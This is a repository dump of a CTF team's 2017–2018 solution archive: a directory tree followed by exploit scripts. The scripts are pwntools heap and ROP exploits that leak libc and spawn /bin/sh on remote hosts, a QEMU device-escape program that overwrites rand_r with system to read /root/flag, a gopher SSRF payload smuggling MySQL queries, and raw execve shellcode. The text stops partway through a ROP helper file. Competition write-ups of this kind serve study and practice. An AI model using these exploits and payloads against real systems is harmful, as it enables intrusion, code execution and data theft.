│ │ ├── _7amebox_patched.py │ │ │ │ ├── d9dbb37c3a555979f021e9a60908ee6a │ │ │ │ ├── memo.txt │ │ │ │ └── solve.py │ │ │ ├── marimo/ │ │ │ │ ├── 7ae39f9f3910ac6928dffc35a2b25548 │ │ │ │ └── solve.py │ │ │ └── melong/ │ │ │ ├── 3cba1eb7a5bcd42097c3c3b6ff74c3a0 │ │ │ └── solve.py │ │ └── web/ │ │ ├── SimpleCMS/ │ │ │ └── index.md │ │ └── rbSql/ │ │ ├── dbconn.php │ │ ├── exp.py │ │ └── index.php │ ├── csaw-quals-2018/ │ │ ├── ppc/ │ │ │ └── bin_t/ │ │ │ └── exp.py │ │ ├── pwn/ │ │ │ ├── alien/ │ │ │ │ ├── aliensVSsamurais │ │ │ │ └── exp.py │ │ │ ├── doubletrouble/ │ │ │ │ ├── doubletrouble │ │ │ │ ├── exp.py │ │ │ │ └── libc.so.6 │ │ │ └── plc/ │ │ │ └── exp.py │ │ └── web/ │ │ ├── hackermovie/ │ │ │ └── README.md │ │ ├── ldab/ │ │ │ └── README.md │ │ ├── novuln/ │ │ │ └── README.md │ │ └── sso/ │ │ └── README.md │ ├── ctfzone-quals-2018/ │ │ ├── crypto/ │ │ │ └── SignatureServer/ │ │ │ ├── exp.py │ │ │ ├── exp2.py │ │ │ └── server.py │ │ └── ppc/ │ │ └── PlusMinus/ │ │ └── exp.py │ ├── defcon-quals-2018/ │ │ └── pwn/ │ │ └── babypwn/ │ │ ├── baby.c │ │ └── solve_babypwn_ref.py │ ├── dragonctf-2018/ │ │ ├── crypto/ │ │ │ └── aes/ │ │ │ ├── exp.py │ │ │ ├── exp12.py │ │ │ ├── exp2.py │ │ │ ├── exp3.py │ │ │ ├── exp43.py │ │ │ ├── flag │ │ │ ├── secret.py │ │ │ └── server.py │ │ └── web/ │ │ └── Nodepad/ │ │ ├── README.md │ │ ├── cli.py │ │ └── notes.js │ ├── google-2018/ │ │ └── web/ │ │ └── gcalc/ │ │ ├── README.md │ │ └── app.js │ ├── hacklu-2018/ │ │ ├── crypto/ │ │ │ └── relate/ │ │ │ └── exp.py │ │ ├── pwn/ │ │ │ ├── babyexploit/ │ │ │ │ ├── chall │ │ │ │ └── exp.py │ │ │ ├── heap_heaven_2/ │ │ │ │ ├── exp.py │ │ │ │ ├── heap_heaven_2 │ │ │ │ └── libc.so.6 │ │ │ ├── heap_hell/ │ │ │ │ ├── exp.py │ │ │ │ ├── heap_hell │ │ │ │ └── libc.so.6 │ │ │ ├── heap_hell_2/ │ │ │ │ ├── exp.py │ │ │ │ ├── heap_hell_2 │ │ │ │ └── libc.so.6 │ │ │ └── slot_machine/ │ │ │ ├── exp1.py │ │ │ ├── exp2.py │ │ │ ├── libc.so.6 │ │ │ └── slot_machine │ │ └── web/ │ │ └── BabyPHP/ │ │ ├── README.md │ │ └── index.php │ ├── hctf-quals-2018/ │ │ ├── blockchain/ │ │ │ └── ez2win/ │ │ │ └── exp.md │ │ ├── crypto/ │ │ │ ├── xor_game/ │ │ │ │ ├── challenge.py │ │ │ │ ├── cipher.txt │ │ │ │ └── exp.py │ │ │ └── xor_rsa/ │ │ │ ├── rsa.py │ │ │ ├── short.sage │ │ │ └── short.sage.py │ │ └── misc/ │ │ └── freqgame/ │ │ ├── freqexp.py │ │ └── freqgame.py │ ├── hitcon-2018/ │ │ ├── crypto/ │ │ │ └── key/ │ │ │ ├── exp.py │ │ │ ├── exp2.py │ │ │ ├── exp3.py │ │ │ ├── flag │ │ │ ├── server.py │ │ │ └── test.py │ │ ├── misc/ │ │ │ └── ev3scanner/ │ │ │ ├── ev3_scanner_record.pklg │ │ │ └── test.py │ │ └── pwn/ │ │ ├── abyss/ │ │ │ ├── README.md │ │ │ ├── exp1.py │ │ │ ├── exp2.py │ │ │ ├── exp3.py │ │ │ ├── flag │ │ │ ├── flag2 │ │ │ ├── flag3-md5-of-content │ │ │ ├── hypervisor.elf │ │ │ ├── ld.so.2 │ │ │ └── libc.so.6 │ │ ├── baby_tcache/ │ │ │ ├── baby_tcache │ │ │ ├── exp.py │ │ │ └── libc.so.6 │ │ └── children_tcache/ │ │ ├── children_tcache │ │ ├── exp.py │ │ └── libc.so.6 │ ├── meepwn-final-2018/ │ │ ├── crypto/ │ │ │ └── esor/ │ │ │ ├── exp.py │ │ │ ├── exp2.py │ │ │ └── src.py │ │ └── pwn/ │ │ ├── babyarm/ │ │ │ ├── babyarm │ │ │ ├── exp.py │ │ │ ├── gdb.sh │ │ │ ├── libc.so.6 │ │ │ └── run.sh │ │ ├── emu8/ │ │ │ ├── bf │ │ │ ├── emu8 │ │ │ ├── exp.py │ │ │ └── libc.so.6 │ │ └── jump/ │ │ ├── exp.py │ │ └── jump │ ├── meepwn-quals-2018/ │ │ ├── crypto/ │ │ │ ├── bazik/ │ │ │ │ ├── exp.py │ │ │ │ ├── key.pub │ │ │ │ ├── solve.py │ │ │ │ └── solve.sage │ │ │ ├── bitbitbit/ │ │ │ │ ├── README.md │ │ │ │ ├── midbit.py │ │ │ │ └── solve.sage │ │ │ ├── esor/ │ │ │ │ ├── exp.py │ │ │ │ └── server.py │ │ │ ├── old_school/ │ │ │ │ ├── README.md │ │ │ │ ├── part_1.txt │ │ │ │ ├── part_2.txt │ │ │ │ └── part_3.txt │ │ │ └── still_old_school/ │ │ │ ├── README.md │ │ │ ├── aes_server.py │ │ │ ├── mid.py │ │ │ └── sock.py │ │ └── web/ │ │ └── grandline/ │ │ ├── README.md │ │ └── index.php │ ├── n1ctf-2018/ │ │ ├── crypto/ │ │ │ ├── baby_N1ES/ │ │ │ │ ├── N1ES.py │ │ │ │ ├── README.md │ │ │ │ └── challenge.py │ │ │ └── easy_fs/ │ │ │ ├── README.md │ │ │ └── easy_fs │ │ ├── misc/ │ │ │ └── math_gath/ │ │ │ ├── debug.txt │ │ │ └── mathGame.py │ │ ├── pwn/ │ │ │ ├── beeper/ │ │ │ │ ├── beeper │ │ │ │ └── solve.py │ │ │ ├── network_card/ │ │ │ │ └── solve.c │ │ │ ├── null/ │ │ │ │ └── solve.py │ │ │ └── vote/ │ │ │ ├── solve.py │ │ │ ├── solve2.py │ │ │ └── vote │ │ └── re/ │ │ ├── baby_neural_network/ │ │ │ ├── README.md │ │ │ └── baby_neural_network │ │ └── lfi/ │ │ ├── README.md │ │ └── decompiled.lua │ ├── pico-2018/ │ │ └── pwn/ │ │ └── cake/ │ │ ├── cake │ │ └── solve_cake.py │ ├── plaidctf-2018/ │ │ └── pwn/ │ │ └── shop/ │ │ ├── shop │ │ └── solve_shop.py │ ├── seccon-quals-2018/ │ │ └── pwn/ │ │ ├── q-escape/ │ │ │ └── solve.c │ │ └── simplememo/ │ │ ├── exp.py │ │ ├── libc.so.6 │ │ ├── memo │ │ └── sc.s │ ├── starctf-2018/ │ │ ├── pwn/ │ │ │ ├── babystack/ │ │ │ │ └── solve.py │ │ │ ├── calc/ │ │ │ │ └── solve.py │ │ │ ├── heap/ │ │ │ │ └── solve.py │ │ │ ├── note/ │ │ │ │ ├── libc.so.6 │ │ │ │ ├── note │ │ │ │ └── solve_note_ref.py │ │ │ ├── primepwn/ │ │ │ │ └── solve.py │ │ │ ├── stackoverflow/ │ │ │ │ └── solve.py │ │ │ ├── url/ │ │ │ │ ├── c1c1d680-836d-4b96-8648-772ee5cd81b7.urlparse-47e10be0295a1c6c479a260239f5e0b1fd0c9696 │ │ │ │ └── solve.py │ │ │ └── url2/ │ │ │ ├── cb57c387-959a-4dd1-845c-48701eabc608.urlparse2-123d085f1337ff85aaff95b1c23e5cabedc6e2cb │ │ │ ├── libc.so.6-56d992a0342a67a887b8dcaae381d2cc51205253 │ │ │ └── solve.py │ │ └── re/ │ │ ├── BabyDroid/ │ │ │ ├── README.md │ │ │ └── baby.apk │ │ └── wasm/ │ │ ├── README.md │ │ ├── check.wasm │ │ ├── solve.py │ │ └── tea.py │ ├── twctf-2018/ │ │ └── crypto/ │ │ ├── mixed/ │ │ │ ├── exp.py │ │ │ ├── exp2.py │ │ │ ├── lsbtest.py │ │ │ ├── lsbtest2.py │ │ │ ├── lsbtest3.py │ │ │ ├── mt19937predictor.py │ │ │ ├── server.py │ │ │ └── testmt.py │ │ └── scs7/ │ │ └── exp.py │ ├── uiuctf-2018/ │ │ └── pwn/ │ │ └── how2heap/ │ │ ├── how2heap │ │ └── solve_how2heap.py │ ├── wctf-2018/ │ │ ├── crypto/ │ │ │ ├── rsa/ │ │ │ │ ├── README.md │ │ │ │ ├── cinv.py │ │ │ │ └── wmap.cpp │ │ │ └── sgx_encrypt/ │ │ │ ├── exp.py │ │ │ └── exp2.py │ │ └── pwn/ │ │ └── klist/ │ │ └── solve.c │ └── xnuca-quals-2018/ │ ├── crypto/ │ │ ├── unconditional_security/ │ │ │ ├── solve.py │ │ │ └── unconditional_security │ │ └── warmup/ │ │ ├── Buggy_Server.py │ │ ├── exp.py │ │ └── sniffed.pcapng │ ├── pwn/ │ │ ├── 0gadget/ │ │ │ ├── 0gadget │ │ │ └── solve_0gadget.py │ │ ├── gets/ │ │ │ ├── exp.py │ │ │ └── gets │ │ ├── revenge/ │ │ │ ├── exp.py │ │ │ └── revenge │ │ ├── secretcenter/ │ │ │ ├── exp.py │ │ │ ├── hint.txt │ │ │ ├── libc.so.6 │ │ │ ├── secret.txt │ │ │ └── secret_center │ │ ├── ssd/ │ │ │ └── solve.c │ │ └── steak/ │ │ ├── exp.py │ │ └── steak │ └── re/ │ ├── code_interpreter/ │ │ ├── Code_Interpreter │ │ ├── code │ │ └── emu.py │ └── renn/ │ ├── checkpoint │ ├── exp.py │ ├── model.data-00000-of-00001 │ ├── model.index │ ├── model.meta │ └── renn.py ├── 2022/ │ └── darksol/ │ ├── README.md │ ├── solve1/ │ │ ├── exploit.py │ │ ├── solana_helpers.py │ │ └── solution/ │ │ ├── Makefile │ │ ├── dist/ │ │ │ ├── solution/ │ │ │ │ └── solution.o │ │ │ └── solution-keypair.json │ │ └── src/ │ │ └── solution/ │ │ └── solution.c │ ├── solve2/ │ │ ├── exploit.py │ │ ├── solana_helpers.py │ │ └── solution/ │ │ ├── Makefile │ │ ├── dist/ │ │ │ ├── solution/ │ │ │ │ └── solution.o │ │ │ └── solution-keypair.json │ │ └── src/ │ │ └── solution/ │ │ └── solution.c │ ├── solve3/ │ │ ├── exploit.py │ │ ├── solana_helpers.py │ │ └── solution/ │ │ ├── Makefile │ │ ├── dist/ │ │ │ ├── solution/ │ │ │ │ └── solution.o │ │ │ └── solution-keypair.json │ │ └── src/ │ │ └── solution/ │ │ └── solution.c │ └── source/ │ ├── darksols/ │ │ ├── .dockerignore │ │ ├── Cargo.toml │ │ ├── Dockerfile │ │ ├── spl-token/ │ │ │ ├── .cargo-checksum.json │ │ │ ├── Cargo.toml │ │ │ ├── Xargo.toml │ │ │ ├── inc/ │ │ │ │ └── token.h │ │ │ ├── program-id.md │ │ │ └── src/ │ │ │ ├── entrypoint.rs │ │ │ ├── error.rs │ │ │ ├── instruction.rs │ │ │ ├── lib.rs │ │ │ ├── native_mint.rs │ │ │ ├── processor.rs │ │ │ └── state.rs │ │ └── src/ │ │ └── main.rs │ ├── evil-contract/ │ │ ├── Makefile │ │ └── src/ │ │ ├── evil-contract/ │ │ │ └── evil-contract.c │ │ └── shared/ │ │ ├── clock.h │ │ ├── program.h │ │ └── test.h │ └── programs/ │ ├── Makefile │ └── src/ │ ├── darksols/ │ │ └── darksols.c │ └── shared/ │ ├── clock.h │ ├── program.h │ └── test.h ├── LICENSE ├── README.md └── todo.md ================================================ FILE CONTENTS ================================================ ================================================ FILE: .gitattributes ================================================ baby_neural_network filter=lfs diff=lfs merge=lfs -text ================================================ FILE: .gitignore ================================================ .DS_Store *.pyc .gdb_history __pycache__ ================================================ FILE: .gitmodules ================================================ [submodule "2019"] path = 2019 url = https://github.com/0ops/ctfs-2019.git [submodule "2020"] path = 2020 url = https://github.com/0ops/ctfs-2020.git [submodule "2021"] path = 2021 url = https://github.com/0ops/ctfs-2021.git ================================================ FILE: 2017/0ctf-quals-2017/StarCraft/StarCraft_remote.py ================================================ #!/usr/bin/env python # coding=utf-8 from pwn import * from pwnlib.log import * port = 12321 service = 'StarCraft' timeout = 30 author = "izhuer" def output(name, data): info(name + ': %#x', data) def lmov(data): bit = data >> 31 data = data << 1; data = (data | bit) & 0xffffffff return data def exploit(ip): # r = process('./StarCraft') #, aslr = False) # pid = r.proc.pid r = remote(ip, port) # r = remote('localhost', port) # r.recvuntil('Pid of subprocess: ') # pid = int(r.recvline().strip()) # e = ELF('./StarCraft') # context.log_level = 'debug' context.terminal = ['tmux', 'splitw', '-h'] script = """ b exit """ # gdb.attach(pid, execute = script) ###################### exp starts here ##################### map(r.sendline, ['1', '24', "zhangzhuo"]) r.recvuntil('Menu') for i in xrange(9): map(r.sendline, ['6', '1', str(9 - i), str(9 - i), 'y']) r.recvuntil('Menu') map(r.sendline, ['3', '0', '0']) r.recvuntil('Menu') map(r.sendline, ['5', '2', '1', 'zz']) r.recvuntil('Menu') for i in xrange(7): map(r.sendline, ['4', '1', '1']) r.recvuntil('Menu') map(r.sendline, ['6', '1', '0', '0', 'y']) r.recvuntil('Menu') map(r.sendline, ['6', '1', '0', '0', 'y']) r.recvuntil('Menu') map(r.sendline, ['2', '32', p32(0x804cffc) + p32(0x1) + p32(0) * 5]) r.recvuntil('Menu') map(r.sendline, ['6', '2', '0']) r.recvuntil("a version ") atoi_addr = u32(r.recv(4)) output("atoi_addr", atoi_addr) system_addr = atoi_addr - 0x0002f850 + 0x0003e3e0 output("system_addr", system_addr) binsh_addr = atoi_addr - 0x0002f850 + 0x15f551 output("binsh_addr", binsh_addr) xor_addr = atoi_addr - 0x30138 output("xor_addr", xor_addr) exit_funcs_addr = atoi_addr + 0x17a990 output("exit_funcs_addr", exit_funcs_addr) r.recvuntil('Menu') target_data = system_addr output("target_data", target_data) for i in xrange(9): target_data = lmov(target_data) output("target_data", target_data) map(r.sendline, ['2', '32', p32(binsh_addr) + p32(exit_funcs_addr + 0xc) + p32(xor_addr)]) r.recvuntil('war!\n') r.sendline('0') r.recvuntil('nickname\n') r.sendline(p32(target_data) + p32(binsh_addr)) r.interactive() ######################### exp ends ######################### if __name__ == "__main__": exploit('202.120.7.212') ================================================ FILE: 2017/34c3-2017/web/blog/cli.py ================================================ import requests from saker.main import Saker class Blog(Saker): def __init__(self, url=""): super(Blog, self).__init__(url) def getToken(self): target = "csrfmiddlewaretoken' value='" index = self.lastr.content.find(target) + len(target) return self.lastr.content[index:].split("'")[0] def signup(self, name, pwd="123asdzxc"): self.get("signup/") data = { "username": name, "password1": pwd, "password2": pwd, "csrfmiddlewaretoken": self.getToken(), } self.post("signup/", data=data) # print(self.lastr.content) def login(self, name, pwd="123asdzxc"): self.get("login/") data = { "username": name, "password": pwd, "csrfmiddlewaretoken": self.getToken(), } self.post("login/", data=data) # print(self.lastr.content) def publish(self, title, content): self.get() captcha = eval(self.lastr.content.split("What is ")[1].split("?")[0]) data = { "title": title, "post": content, "captcha_answer": captcha, "csrfmiddlewaretoken": self.getToken(), } self.post("publish", data=data) def feed(self, ftype="json", callback=""): params = { "type": ftype, "cb": callback, } self.get("feed", params=params) print(self.lastr.content) def flag1(self): self.get("flag1") def flagapi(self): self.get() captcha = eval(self.lastr.content.split("What is ")[1].split("?")[0]) data = { "captcha_answer": captcha, } self.post("flagapi", data=data) if __name__ == '__main__': b = Blog("http://35.197.245.102/") username = "lyle4" b.signup(username) b.login(username) b.flagapi() exit() # 访问flag1 # 获取页面 # 转发 b.feed("jsonp", "alert") b.signup(username) b.login(username) b.publish("title", '"+2+"') b.publish("test", "") b.feed("jsonp", "eval") b.publish("lyel2", "") b.feed("jsonp", "alert") ================================================ FILE: 2017/34c3-2017/web/extract/index.py ================================================ import requests from urllib import quote from urllib import unquote url = "http://35.198.175.71/?url=" csrf = "gopher://foo@localhost:f@t.cn:3306/" payload = "\x5f\xad\x00\x00\x01\x85\xa6\xff\x01\x00\x00\x00\x01\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "m4st3r_ov3rl0rd\x00\x00mysql_native_password\x00e\x03_os\x05Linux\x0c_client_name\x08libmysql\x04_pid\x041599\x0f_client_version\x065.7.20\t_platform\x06x86_64\x0cprogram_name\x05mysql9\x00\x00\x00\x03" payload += "select if(ascii(mid(flag, 1,1))> 10,1,11) from flag.flag" payload = quote(payload) payload = quote(csrf+payload) payload = "gopher://foo@[cafebabe.cf]@yolo.com:3306/A%48%00%00%01%85%a6%3f%20%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%6d%34%73%74%33%72%5f%6f%76%33%72%6c%30%72%64%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%00%4c%01%00%00%03%73%65%6c%65%63%74%20%63%6f%6e%63%61%74%28%63%61%73%74%28%30%78%35%30%34%62%30%33%30%34%30%61%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%36%34%30%30%30%30%30%30%36%34%30%30%30%30%30%30%30%61%30%30%30%30%30%30%36%37%36%39%36%64%36%64%36%35%35%66%36%36%36%63%36%31%36%37%20%61%73%20%62%69%6e%61%72%79%29%2c%20%72%70%61%64%28%66%6c%61%67%2c%20%31%30%30%2c%20%27%41%27%29%2c%20%63%61%73%74%28%30%78%35%30%34%62%30%31%30%32%31%65%30%33%30%61%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%36%34%30%30%30%30%30%30%36%34%30%30%30%30%30%30%30%61%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%36%37%36%39%36%64%36%64%36%35%35%66%36%36%36%63%36%31%36%37%35%30%34%62%30%35%30%36%30%30%30%30%30%30%30%30%30%31%30%30%30%31%30%30%33%38%30%30%30%30%30%30%38%63%30%30%30%30%30%30%30%30%30%30%20%61%73%20%62%69%6e%61%72%79%29%29%20%66%72%6f%6d%20%66%6c%61%67%2e%66%6c%61%67%2d%2d%20%2d%46%4f%4f%4f%4f%4f%4f%4f%4f%4f%4f%4f%4f%42%41%52" payload = quote(payload) r = requests.get(url + payload) print r.content ================================================ FILE: 2017/blizzard-2017/strng/README.md ================================================ [Chall](https://github.com/rcvalle/blizzardctf2017/releases/download/v0.0.1/strng.tar.gz) ================================================ FILE: 2017/blizzard-2017/strng/solve.c ================================================ /* * author: luckasdf0 * build: gcc ./solve.c */ #define _GNU_SOURCE #include #include #include #include #include #include #include #include #define LOG(...) printf(__VA_ARGS__) void die(const char* msg) { perror(msg); _exit(-1); } void hexdump(uint8_t *mem, size_t len) { for (size_t i = 1; i <= len; i++) { printf("%02x ", mem[i-1]); if (i % 16 == 0) printf("\n"); else if (i % 8 == 0) printf(" "); } } #define STRNG_MMIO_ADDR 0x00000000febf1000 #define STRNG_MMIO_SIZE 0x100 #define STRNG_MMIO_MAP_BASE 0xdead0000 #define STRNG_PMIO_BASE 0x000000000000c050 #define STRNG_PMIO_SIZE 0x8 void pmio_write(uint64_t addr, uint32_t value) { outl(value, STRNG_PMIO_BASE+addr); } uint32_t pmio_read(uint64_t addr) { return inl(STRNG_PMIO_BASE+addr); } int main(int argc, char const* argv[]) { int devmem_fd; uint64_t libc_srandom = 0; uint64_t libc_base = 0; uint64_t libc_system = 0; if (iopl(3) != 0) { die("iopl"); } devmem_fd = open("/dev/mem", O_RDWR | O_SYNC); if (devmem_fd < 0) { die("open /dev/mem"); } if (!mmap((void *)STRNG_MMIO_MAP_BASE, STRNG_MMIO_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, devmem_fd, STRNG_MMIO_ADDR)) { die("mmap mmio"); } close(devmem_fd); // leak pmio_write(0, 0x104); libc_srandom = pmio_read(4); pmio_write(0, 0x108); libc_srandom += ((uint64_t)pmio_read(4))<<32; libc_base = libc_srandom - 0x3a8d0; LOG("libc_srandom : 0x%016llx", libc_srandom); LOG("libc_base : 0x%016llx", libc_base); libc_system = libc_base + 0x45390; // prepare argument for system pmio_write(0, 0x8); pmio_write(4, 1852400175); pmio_write(0, 0xc); pmio_write(4, 0x41414141); pmio_write(0, 0x10); pmio_write(4, 1952539451); // ";cat" pmio_write(0, 0x14); pmio_write(4, 1869754144); // " /ro" pmio_write(0, 0x18); pmio_write(4, 1714386031); // "ot/f" pmio_write(0, 0x1c); pmio_write(4, 996630892); // "lag;" // overwrite rand_r pmio_write(0, 0x114); pmio_write(4, libc_system&0xffffffff); pmio_write(0, 0x118); pmio_write(4, libc_system>>32); // triger pmio_write(0, 0xc); pmio_write(4, 0xdeadbeef); return 0; } ================================================ FILE: 2017/csaw-quals-2017/pwn/auir/auir.py ================================================ import sys from pwn import * __author__ = 'b1gtang ' #context.log_level = 'info' context.log_level = 'debug' context.terminal = ['tmux', 'splitw', '-h'] L = False # local or remote E = False # set env BIN_NAME = sys.argv[1] BIN_BASE = 0x0000555555554000 LIBC32_L = '/lib/i386-linux-gnu/libc.so.6' LIBC32_R = './libc_32.so.6' LIBC64_L = '/lib/x86_64-linux-gnu/libc.so.6' LIBC64_R = './libc_64.so.6' if E: os.environ['LD_PRELOAD'] = '.' if L: libc = ELF('./libc.so.6') r = process(BIN_NAME) else: libc = ELF('./libc.so.6') r = remote('pwn.chal.csaw.io',7713) # gdb.attach(r, execute='b *0x%x' % (BIN_BASE+0x0000000000001201)) #gdb.attach(r, execute='b *0x%x' % (0x000000000402060)) def add_chunk(content,size): r.recvuntil('>>') r.sendline('1') r.recvuntil('>>') r.sendline(str(size)) r.recvuntil('>>') r.sendline(content) def del_chunk(idx): r.recvuntil('>>') r.sendline('2') r.recvuntil('>>') r.sendline(str(idx)) def fix_chunk(idx,content,size): r.recvuntil('>>') r.sendline('3') r.recvuntil('>>') r.sendline(str(idx)) r.recvuntil('>>') r.sendline(str(size)) r.recvuntil('>>') r.sendline(content) def see_chunk(idx): r.recvuntil('>>') r.sendline('4') r.recvuntil('>>') r.sendline(str(idx)) add_chunk(0x10*'a',0x80) add_chunk(0x10*'a',0x60) add_chunk(0x10*'a',0x60) add_chunk('/bin/sh\x00',0x60) del_chunk(0) see_chunk(0) r.recvuntil('[*]SHOWING....\n') libc_base = u64(r.recv(8))-0x3c4b78 print hex(libc_base) del_chunk(2) #fix_chunk(1,0x60*'b'+p64(0)+p64(0x71)+p64(libc_base+0x3c5ce5),0x78) fix_chunk(1,0x60*'b'+p64(0)+p64(0x71)+p64(libc_base+0x3c4aed),0x78) add_chunk(0x10*'a',0x60) add_chunk(0x10*'a',0x60) fix_chunk(5,'\x00'*(0x83-8)+p64(libc_base+0x3c5c50),0x90) add_chunk(0x10*'d',0x80) add_chunk(0x1*'a',0xb00) add_chunk(0x38*'\x00'+p64(libc_base+libc.symbols['system']),0x40) del_chunk(3) r.interactive() #r.sendline('cat /*/*/flag') ================================================ FILE: 2017/csaw-quals-2017/pwn/pilot/solve_pilot.py ================================================ from pwn import * context(os='linux',arch='amd64',log_level='debug') p=process('./pilot') #p=remote('pwn.chal.csaw.io',8464) #gdb.attach(p,'b *0x400ae0') print p.recvuntil('Location:') get=p.recvline() print get addr=int(get,16) print p.recvuntil('Command:') payload="\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05"+'a'*(32-24+8)+p64(addr) print payload p.sendline(payload) p.interactive() ================================================ FILE: 2017/csaw-quals-2017/pwn/scv/scv.py ================================================ import os import sys from pwn import * __author__ = 'b1gtang' context.log_level = 'info' # context.log_level = 'debug' context.terminal = ['tmux', 'splitw', '-h'] L = False # local or remote E = True # set env BIN_NAME = sys.argv[1] BIN_BASE = 0x0000555555554000 LIBC32_L = '/lib/i386-linux-gnu/libc.so.6' LIBC32_R = './libc_32.so.6' LIBC64_L = '/lib/x86_64-linux-gnu/libc.so.6' LIBC64_R = './libc_64.so.6' if E: os.environ['LD_PRELOAD'] = './libc.so.6' if L: libc = ELF('./libc.so.6') r = process(BIN_NAME) else: libc = ELF('./libc.so.6') r = remote('pwn.chal.csaw.io',3764) #gdb.attach(r, execute='b *0x%x' % (0x000000000400CCE)) # gdb.attach(r, execute='b *0x%x' % (0x0000000000001201)) r.recvuntil('>>') r.sendline('1') r.recvuntil('>>') r.sendline('a'*0xa8) r.recvuntil('>>') r.sendline('2') r.recvuntil('aaaa\n') canary = r.recv(7) print canary.encode('hex') r.recvuntil('>>') r.sendline('1') r.recvuntil('>>') r.sendline('a'*(0xb8-1)) r.recvuntil('>>') r.sendline('2') r.recvuntil('aaaa\n') data = r.recv(6)+'\x00\x00' libc_base = u64(data)-0x20830 print hex(libc_base) system_addr = libc_base + libc.symbols['system'] bin_sh_addr = libc_base + libc.search('/bin/sh').next() print hex(system_addr) print hex(bin_sh_addr) r.recvuntil('>>') r.sendline('1') r.recvuntil('>>') r.sendline('a'*0xa8+'\x00'+canary+'b'*8+p64(0x0000000000400ea3)+p64(bin_sh_addr)+p64(system_addr)) r.interactive() #r.sendline('cat /*/*/flag') ================================================ FILE: 2017/hacklu-2017/pwn/mult-o-flow/solve_mult-o-flow.py ================================================ #!/usr/bin/python from pwn import * p=process('./mult-o-flow') #p = remote('flatearth.fluxfingers.net', 1746) context(arch='i386',log_level='debug') def main(): p.recvuntil('>') p.send('a'*62+'sh') canary=0x112233 system_addr=0x48882 s_addr=0x4b124+0xf8 p.recvuntil('tables :-)\n') dest='z'*0x1000 s='ISP:'+' '*9 s=s.rjust(0x200,'s') v3='City:'+' '*9 v3=v3.rjust(0x200-0xff,'3') v3='/bin/sh'.rjust(0xff,'a')+v3 over='a'*4+p32(canary)[:-1]+'<'+'a'*0x10+p32(system_addr)[:-1]+'<'+p32(s_addr)[:-1] payload=dest+s+v3+over #gdb.attach(p,'b *0x48c53\nb *0x48a14') p.send(payload) p.interactive() if __name__=='__main__': main() ================================================ FILE: 2017/tuctf-2017/pwn/guestbook/solve_guestbook.py ================================================ from pwn import * context(log_level='debug',arch='i386') p=process("./guestbook")#,env={"LD_PRELOAD":"./libc.so.6"})#,aslr=False) #p=remote("guestbook.tuctf.com",4545) #,"b *0x%x\nb *0x%x"%(0x56555000+0x9c6,0x56555000+0x8de)) libc=ELF('./libc.so.6') #p.interactive() p.sendafter(">>>","aaa\n") p.sendafter(">>>",'bbb\n') p.sendafter(">>>",'/bin/sh;\n') p.sendafter(">>>",'ddd\n') #14 -0x26f=ebp p.sendafter(">>",'1\n') p.sendafter(">>>",'6\n') heapbase=u32(p.recv(4))-8 p.sendafter(">>",'1\n') p.sendafter(">>>","47\n") libc1addr=u32(p.recv(4)) p.sendafter(">>",'2\n') p.sendafter(">>>",'6\n') p.sendafter(">>>",p32(libc1addr+8)+'\n'+'\n') p.sendafter(">>",'1\n') p.sendafter(">>>",'0\n') code_base=u32(p.recv(4))-0x1ef0 p.sendafter(">>",'2\n') p.sendafter(">>>",'6\n') p.sendafter(">>>",p32(code_base+0x2014)+'\n'+'\n') p.sendafter(">>",'1\n') p.sendafter(">>>",'0\n') sysaddr=u32(p.recv(4))-0x65b40+0x3ada0 log.success("heapbase: 0x%x sysaddr: 0x%x code_base: 0x%x"%(heapbase,sysaddr,code_base)) p.sendafter(">>",'2\n') p.sendafter(">>>",'6\n') p.sendafter(">>>",p32(code_base+0x2018)+'\n'+'\n') p.sendafter(">>",'2\n') p.sendafter(">>>",'0\n') gdb.attach(p) p.sendafter(">>>",p32(sysaddr)+'\n'+'\n') p.sendafter(">>",'2\n') p.sendafter(">>>",'2\n') p.sendafter(">>>","/bin/sh;"+'\n'+'\n') p.interactive() #0004| 0xffffd0a0 --> 0xffffd074 --> 0x56559040 ("/bin/sh;") ================================================ FILE: 2018/0ctf-final-2018/pwn/blackhole2/solve_blackhole2.py ================================================ from pwn import * import random, string, subprocess, os, sys from hashlib import sha256 import time dicti='asdfghjklqwertyuiop1234567890zxcvbnmASDFGHJKLQWERTYUIOPZXCVBNM_\{\} ~!@#$%^&*()+`-=|[]\:";\'<>?,./' # context(log_level='debug') # p=process('./blackhole2') # # p=remote('localhost',1234) def proof_of_work(): chal=p.recv(16) sol = ''.join(random.choice(string.letters+string.digits) for _ in xrange(4)) while not sha256(chal + sol).hexdigest().startswith('0000'): sol = ''.join(random.choice(string.letters+string.digits) for _ in xrange(4)) p.send(sol) # gdb.attach(p,'b *0x400a2a\nb *0x400720\nc\nc\nc\nc\nc\nc\nc\nc\nc\nc\nc\nc\nc\nc\nc\nc\nc') # gdb.attach(p,'b *0x400a2a\nb *0x400720\nc') def ret2csu(rbx,rbp,r12,r13_rdx,r14_rsi,r15_rdi): s=p64(0x400a2a)+p64(rbx)+p64(rbp)+p64(r12)+p64(r13_rdx)+p64(r14_rsi)+p64(r15_rdi) s=s+p64(0x400A10) # call qword ptr [r12+rbx*8] return s def calc(rbp,ret): if ret>(rbp-1)*8: return ret-(rbp-1)*8 else: return (~((ret-(rbp-1)*8)-1)^(2**64-1))+1 def pop_rdi(rdi): return p64(0x400a33)+p64(rdi) def pop_rsi_r15(rsi,r15): return p64(0x400a31)+p64(rsi)+p64(r15) def leave_ret(): return p64(0x400985) def pop_rbp(rbp): return p64(0x4007c0)+p64(rbp) def pop_rbp(): return p64(0x4007c0) def pop_rsp_r13_r14_r15(rsp,r13,r14,r15): return p64(0x400a2d)+p64(rsp)+p64(r13)+p64(r14)+p64(r15) def infinite_loop(): return 